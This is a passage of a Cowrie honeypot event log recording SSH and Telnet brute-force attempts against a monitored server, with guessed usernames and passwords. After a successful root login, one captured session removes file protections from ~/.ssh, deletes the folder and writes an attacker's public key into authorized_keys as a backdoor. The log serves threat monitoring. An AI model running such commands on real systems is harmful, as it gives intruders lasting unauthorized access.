{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:32:37.540325Z","src_ip":"154.209.4.55","session":"09708e882460"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:32:37.741050Z","src_ip":"154.209.4.55","session":"09708e882460"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"password","message":"login attempt [muhammad/password] failed","sensor":"my-vps","timestamp":"2025-09-09T04:32:38.529960Z","src_ip":"154.209.4.55","session":"09708e882460"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:32:39.739004Z","src_ip":"154.209.4.55","session":"09708e882460"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":45980,"dst_ip":"1.2.3.4","dst_port":22,"session":"8597220f72f8","protocol":"ssh","message":"New connection: 103.59.95.12:45980 (1.2.3.4:22) [session: 8597220f72f8]","sensor":"my-vps","timestamp":"2025-09-09T04:33:32.765744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:33:32.766781Z","src_ip":"103.59.95.12","session":"8597220f72f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:33:33.042932Z","src_ip":"103.59.95.12","session":"8597220f72f8"}
{"eventid":"cowrie.login.failed","username":"boris","password":"1234567","message":"login attempt [boris/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T04:33:34.671398Z","src_ip":"103.59.95.12","session":"8597220f72f8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:35.956888Z","src_ip":"103.59.95.12","session":"8597220f72f8"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":38076,"dst_ip":"1.2.3.4","dst_port":22,"session":"b69641970e40","protocol":"ssh","message":"New connection: 154.209.4.55:38076 (1.2.3.4:22) [session: b69641970e40]","sensor":"my-vps","timestamp":"2025-09-09T04:33:45.981680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:33:45.984377Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:33:46.197591Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.login.success","username":"root","password":"Radore1234","message":"login attempt [root/Radore1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:33:47.032467Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:33:47.511101Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:33:47.511902Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:33:47.513643Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:47.732000Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:33:48.204508Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.205196Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51342,"dst_ip":"1.2.3.4","dst_port":22,"session":"82c19489522a","protocol":"ssh","message":"New connection: 217.72.205.35:51342 (1.2.3.4:22) [session: 82c19489522a]","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.291542Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.292662Z","src_ip":"217.72.205.35","session":"82c19489522a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.420917Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.421758Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":38481,"dst_ip":"1.2.3.4","dst_port":22,"session":"160b8eb68efe","protocol":"ssh","message":"New connection: 154.209.4.55:38481 (1.2.3.4:22) [session: 160b8eb68efe]","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.635924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.642333Z","src_ip":"154.209.4.55","session":"160b8eb68efe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:33:48.845064Z","src_ip":"154.209.4.55","session":"160b8eb68efe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:33:49.662499Z","src_ip":"154.209.4.55","session":"160b8eb68efe"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:50.875666Z","src_ip":"154.209.4.55","session":"160b8eb68efe"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":39040,"dst_ip":"1.2.3.4","dst_port":22,"session":"0727af56afd8","protocol":"ssh","message":"New connection: 154.209.4.55:39040 (1.2.3.4:22) [session: 0727af56afd8]","sensor":"my-vps","timestamp":"2025-09-09T04:33:51.079314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:33:51.090639Z","src_ip":"154.209.4.55","session":"0727af56afd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:33:51.295581Z","src_ip":"154.209.4.55","session":"0727af56afd8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:33:52.124365Z","src_ip":"154.209.4.55","session":"0727af56afd8"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:52.335443Z","src_ip":"154.209.4.55","session":"b69641970e40"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:33:52.336492Z","src_ip":"154.209.4.55","session":"0727af56afd8"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":36934,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d3c08ce1b7","protocol":"ssh","message":"New connection: 102.68.86.62:36934 (1.2.3.4:22) [session: d3d3c08ce1b7]","sensor":"my-vps","timestamp":"2025-09-09T04:34:00.767589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:34:00.768232Z","src_ip":"102.68.86.62","session":"d3d3c08ce1b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:34:01.047178Z","src_ip":"102.68.86.62","session":"d3d3c08ce1b7"}
{"eventid":"cowrie.login.failed","username":"data","password":"Password123","message":"login attempt [data/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:34:01.891757Z","src_ip":"102.68.86.62","session":"d3d3c08ce1b7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:34:03.108335Z","src_ip":"102.68.86.62","session":"d3d3c08ce1b7"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":50889,"dst_ip":"1.2.3.4","dst_port":22,"session":"dca591b17080","protocol":"ssh","message":"New connection: 154.209.4.55:50889 (1.2.3.4:22) [session: dca591b17080]","sensor":"my-vps","timestamp":"2025-09-09T04:34:54.934798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:34:54.936237Z","src_ip":"154.209.4.55","session":"dca591b17080"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:34:55.139544Z","src_ip":"154.209.4.55","session":"dca591b17080"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"P@ssw0rd","message":"login attempt [gpadmin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T04:34:55.960903Z","src_ip":"154.209.4.55","session":"dca591b17080"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:34:57.167750Z","src_ip":"154.209.4.55","session":"dca591b17080"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":47280,"dst_ip":"1.2.3.4","dst_port":22,"session":"87979cadaaf6","protocol":"ssh","message":"New connection: 103.59.95.12:47280 (1.2.3.4:22) [session: 87979cadaaf6]","sensor":"my-vps","timestamp":"2025-09-09T04:35:02.299684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:35:02.304414Z","src_ip":"103.59.95.12","session":"87979cadaaf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:35:03.037555Z","src_ip":"103.59.95.12","session":"87979cadaaf6"}
{"eventid":"cowrie.login.failed","username":"data","password":"Password123","message":"login attempt [data/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:35:04.056075Z","src_ip":"103.59.95.12","session":"87979cadaaf6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:35:05.317571Z","src_ip":"103.59.95.12","session":"87979cadaaf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33982,"dst_ip":"1.2.3.4","dst_port":23,"session":"0084926e0d82","protocol":"telnet","message":"New connection: 212.227.125.160:33982 (1.2.3.4:23) [session: 0084926e0d82]","sensor":"my-vps","timestamp":"2025-09-09T04:35:31.325938Z"}
{"eventid":"cowrie.session.closed","duration":13.436522722244263,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:35:44.762393Z","src_ip":"212.227.125.160","session":"0084926e0d82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57908,"dst_ip":"1.2.3.4","dst_port":23,"session":"267e3d83d04e","protocol":"telnet","message":"New connection: 212.227.235.229:57908 (1.2.3.4:23) [session: 267e3d83d04e]","sensor":"my-vps","timestamp":"2025-09-09T04:35:59.195205Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":39232,"dst_ip":"1.2.3.4","dst_port":22,"session":"898672ae67c8","protocol":"ssh","message":"New connection: 102.68.86.62:39232 (1.2.3.4:22) [session: 898672ae67c8]","sensor":"my-vps","timestamp":"2025-09-09T04:36:13.280184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:36:13.281152Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@op